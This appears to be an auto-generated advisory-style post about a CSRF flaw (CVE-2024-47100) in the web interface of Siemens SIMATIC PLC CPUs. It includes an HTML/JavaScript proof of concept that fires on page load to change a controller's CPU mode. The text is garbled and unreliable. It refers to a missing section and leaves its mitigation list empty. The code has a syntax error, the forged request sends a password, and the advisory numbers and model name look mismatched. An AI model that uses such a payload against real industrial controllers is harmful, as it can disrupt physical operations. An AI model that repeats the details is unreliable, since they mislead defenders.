A security vulnerability (CVE-2024-47100) has recently been discovered in the web interface of various SIMATIC S7-120 CPUs, manufactured by Siemens. This vulnerability allows attackers to execute Cross-Site Request Forgery (CSRF) attacks by tricking authenticated users into clicking malicious links. The affected devices include a wide range of models, as listed in the Content section above.

Exploit Details

The web interface in the SIMATIC S7-120 CPUs is vulnerable to CSRF attacks. An unauthenticated attacker can exploit this vulnerability by convincing a legitimate, authenticated user with sufficient permissions to click on a malicious link. This could allow the attacker to change the CPU mode without explicit consent, leading to potential operational disruptions or gateway openings for further malicious activities.

Code Snippet

The following JavaScript code snippet demonstrates how an attacker could create a malicious link that, when clicked by an authenticated user, sends a CSRF request to change the CPU mode of the affected device:

<!DOCTYPE html>
<html>
  <body>
    <script>
      function csrf_attack() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://target_IP_address/settings/changecpu";);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send("password=your_password&mode=desired_cpu_mode");
      }
      window.onload=csrf_attack;
    </script>
  </body>
</html>

Mitigation

To protect against CSRF attacks, users are strongly recommended to implement the following security measures:

Original References

Siemens has acknowledged the vulnerability and published an Advisory detailing the affected products and countermeasures. Please refer to the following link for more information:

- Siemens Security Advisory: SSA-345015: CSRF vulnerability in SIMATIC S7-120 CPUs

Further reading can be found here

- National Vulnerability Database: CVE-2024-47100
- US-CERT ICS Advisory: ICSA-21-168-04 - Siemens SIMATIC S7-120 CPU

Stay vigilant and keep your systems up-to-date to safeguard against potential threats.

Timeline

Published on: 01/14/2025 11:15:16 UTC